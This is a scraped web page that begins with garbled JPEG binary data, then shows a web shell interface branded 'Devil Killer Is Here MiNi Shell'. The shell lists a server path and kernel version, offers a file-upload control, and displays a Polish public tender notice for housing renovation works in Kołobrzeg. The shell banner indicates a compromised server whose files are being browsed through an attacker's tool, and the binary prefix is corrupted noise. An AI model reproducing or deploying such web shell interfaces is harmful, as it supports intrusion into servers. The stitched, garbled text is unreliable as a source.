JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241210/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241210/0064274301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót remontowo-budowlanych lokali mieszkalnych,użytkowych i części wspólnych w budynkach stanowiących zasób Gminy Miasto Kołobrzeg zarządzanych przez Kołobrzeskie TBS Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOŁOBRZESKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920104</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Artyleryjska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kołobrzeg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 722179009</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">94 35 425 74</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lukaszzieba@ktbs.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ktbs.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót remontowo-budowlanych lokali mieszkalnych,użytkowych i części wspólnych w budynkach stanowiących zasób Gminy Miasto Kołobrzeg zarządzanych przez Kołobrzeskie TBS Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bcdf2be7-dcb7-4c93-b4f7-302233f3bca0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00642743</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kolobrzeskietbs.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kolobrzeskietbs.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://kolobrzeskietbs.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOI/03/11/2024 REMONTY BUDYNKI GMK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 8569345,03 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 7141120,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót remontowo-budowlanych lokali mieszkalnych,użytkowych i części wspólnych w budynkach stanowiących zasób Gminy Miasto Kołobrzeg zarządzanych przez Kołobrzeskie TBS Sp. z o.o. część nr 1 - roboty remontowo - budowlane w branży ogólnobudowlanej i sanitarnej.<br/><br/>Zakres robót remontowo-budowlanych w branży ogólnobudowlanej i sanitarnej dotyczących 1 części przedmiotu zamówienia:<br/> 1) Remonty kapitalne oraz bieżące wraz z odnowieniem i modernizacją. Zakres robót przewiduje wymianę i naprawę tynków, odnowienie powłok malarskich, wymianę stolarki okiennej i drzwiowej wraz okuciami, remont podłóg i posadzek w zakresie wzmocnienia lub wymiany uszkodzonych elementów z wykorzystaniem nowych posadzek, roboty hydrauliczne związane z remontem lokali (wymiana części rurarzu, wymiana armatury sanitarnej, naprawa i wymiana instalacji gazowych).<br/> 2) Przy remoncie stropów drewnianych przewiduje się wymianę poszczególnych elementów lub ich wzmocnienie, odgrzybienie, impregnację i izolację.<br/> 3) Przy robotach stolarskich możliwe są wymiany poszczególnych elementów stolarki okiennej i drzwiowej wraz z wymianą okuć na nowe oraz szklenie otworów okiennych i drzwiowych.<br/> 4) W robotach malarskich przewiduje się malowanie elementów metalowych i drewnianych farbami do tego typu przeznaczonymi, szpachlowanie – wykonanie gładzi gipsowych.<br/> 5) W sytuacji, gdy lokal jest wyposażony w piece kaflowe lub trzony kuchenne przewiduje się ich przestawienie oraz naprawę średnią lub główną wraz z wymianą uszkodzonego osprzętu piecowego.<br/> 6) Roboty kowalsko-ślusarskie będą występować w lokalu, który wyposażony jest w elementy metalowe, które podlegać będą remoncie i odnowieniu.<br/> 7) W obiektach niepodpiwniczonych przy konieczności wykonania izolacji wystąpią prace ziemne i prace izolacyjne.<br/> 8) Ponadto przewiduje się wywóz gruzu i odpadów po wykonaniu robót ogólnobudowlanych.<br/>Ponadto zakres robót należy wykonać zgodnie ze sztuką budowlaną, zasadami wiedzy technicznej oraz obowiązującymi przepisami prawa. Wykonawca ma obowiązek wykonywania przedmiotu umowy z należytą starannością, zgodnie z umową i ofertą, nienaruszającymi umowy poleceniami Inspektora nadzoru inwestorskiego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5883218,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót,<br/>zgodnych z przedmiotem zamówienia podstawowego, do 20 % wartości szacunkowej zamówienia podstawowego. Podstawą ustalenia warunków realizacji zamówienia podobnego<br/>jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót remontowo-budowlanych lokali mieszkalnych,użytkowych i części wspólnych w budynkach stanowiących zasób Gminy Miasto Kołobrzeg zarządzanych przez Kołobrzeskie TBS Sp. z o.o. część nr 2 - roboty remontowo-budowlane w branży elektrycznej<br/>Zakres robót remontowo-budowlanych w branży elektrycznej dotyczących 2 części przedmiotu zamówienia:<br/>Remonty kapitalne oraz bieżące wraz z odnowieniem i modernizacją. Zakres robót przewiduje: demontaż instalacji nienadającej się do dalszej eksploatacji, demontaż wyłączników, przełączników, gniazd wtykowych, tablic licznikowych i zabezpieczeń. Wykucie bruzd bez względu na podłoże, montaż przewodów instalacyjnych, puszek instalacyjnych, wykonanie tynku na bruzdach z przewodami, zamontowanie nowego osprzętu wyłączników, przełączników, gniazd, tablic, kuchenek elektrycznych, bojlerów, zabezpieczeń. Wykonanie pomiarów nowej instalacji. Ponadto przewiduje się wywóz gruzu i odpadów po wykonaniu robót instalacyjnych.<br/>Ponadto zakres robót należy wykonać zgodnie ze sztuką budowlaną, zasadami wiedzy technicznej oraz obowiązującymi przepisami prawa. Wykonawca ma obowiązek wykonywania przedmiotu umowy z należytą starannością, zgodnie z umową i ofertą, nienaruszającymi umowy poleceniami Inspektora nadzoru inwestorskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót,<br/>zgodnych z przedmiotem zamówienia podstawowego, do 20 % wartości szacunkowej zamówienia podstawowego. Podstawą ustalenia warunków realizacji zamówienia podobnego<br/>jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają<br/>warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna za spełniony warunek dotyczący sytuacji technicznej<br/>lub zawodowej, jeżeli wykonawca wykaże, że:<br/>a) nie wcześniej niż w okresie ostatnich 5 lat, przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie wykonał (zakończył) co najmniej 2 roboty budowlane<br/>polegające na wykonaniu terenu rekreacji i elementami małej<br/>architektury o tożsamym charakterze i parametrach zgodnych z<br/>przedmiotem zamówienia.<br/>Wykonał (zakończył) 10 robót budowlanych w branży ogólnobudowlanej<br/>oraz sanitarnej polegających na remoncie, zgodnie z opisem przedmiotu<br/>zamówienia dla tej branży, w ilości przepracowanych roboczogodzin, przy<br/>czym minimalna ilość roboczogodzin dla części, na którą składa ofertę<br/>musi wynosić:<br/>CZĘŚĆ 1 – roboty remontowo-budowlane w branży ogólnobudowlanej i<br/>sanitarnej 2000 roboczogodzin,<br/>CZĘŚĆ 2 – roboty remontowo-budowlane w branży elektrycznej – 600<br/>roboczogodzin.<br/>Jako wykonanie (zakończenie) zadania (roboty budowlanej) należy<br/>rozumieć podpisanie Protokołu odbioru robót lub równoważnego<br/>dokumentu.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunek musi zostać spełniony co najmniej przez jednego wykonawcę.<br/>b) dysponuje lub będzie dysponował osobami zdolnymi do<br/>wykonania zamówienia w zakresie objętym zamówieniem, tj.<br/>CZĘŚĆ 1: roboty remontowo budowlane w branży ogólnobudowlanej i<br/>sanitarnej co najmniej jedna osoba posiadającego uprawnienia<br/>kwalifikacyjne do wykonywania prac na wysokościach oraz jedna osoba<br/>posiadająca uprawnienia kwalifikacyjne do wykonywania robót<br/>instalacyjnych w branży sanitarnej,<br/>CZĘŚĆ 2: -roboty remontowo budowlane w branży elektrycznej co<br/>najmniej jedna osoba posiadająca uprawnienia kwalifikacyjne co najmniej<br/>do 1 KV E i D (eksploatacyjno pomiarowe i dozorowe).<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunek musi zostać spełniony co najmniej przez jednego wykonawcę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Dokumenty składane wraz z Formularzem ofertowym - załącznik nr 1 do SWZ:<br/>1) Aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału<br/>w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z<br/>Załącznikiem nr 2 do SWZ;<br/>2) Zobowiązanie innego podmiotu, o którym mowa w Rozdziale XX pkt 6 ppkt 3)<br/>SWZ i/lub inny podmiotowy środek dowodowy (jeżeli dotyczy);<br/>3) Dowód wniesienia wadium w przypadku wadium wnoszonego w formie<br/>niepieniężnej;<br/>4) Dokumenty, z których wynika prawo do podpisania oferty, oświadczeń i<br/>dokumentów; odpowiednie pełnomocnictwa, (jeżeli dotyczy), w tym umocowanie do<br/>reprezentowania podmiotu udostępniającego zasoby na zasadach określonych w <br/>art. 118 ustawy (jeżeli dotyczy).<br/>5) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia -<br/>Oświadczenie konsorcjum/ spółki cywilnej z którego wynika, które roboty<br/>budowlane/usługi/dostawy wykonają poszczególni wykonawcy – oświadczenie<br/>składane na załączniku nr 6 do SWZ.<br/>6) Oświadczenie dotyczące podstaw wykluczenia na podstawie art. 7 ust. 1 ustawy<br/>z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego -<br/>oświadczenie składane na załączniku nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy P.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych<br/>(odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej), jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, ile wykonawca<br/>wskazał w załączniku nr 2 do SWZ dane umożliwiające dostęp do tych<br/>dokumentów.<br/>2) Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, kubatury, daty i miejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od<br/>niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumentyzałącznik<br/>nr 4 do SWZ;<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót<br/>budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz<br/>dotyczy robót budowlanych, w których wykonaniu wykonawca ten<br/>bezpośrednio uczestniczył.<br/>3) Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i<br/>uprawnień, niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami - załącznik nr 5 do SWZ;<br/>5. Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych<br/>lub zawodowych podmiotów udostępniających zasoby na zasadach określonych w art.<br/>118 ustawy P.z.p., złożenia podmiotowych środków dowodowych, o których mowa w<br/>pkt 4 ppkt 1 niniejszego Rozdziału, dotyczących tych podmiotów, potwierdzających, 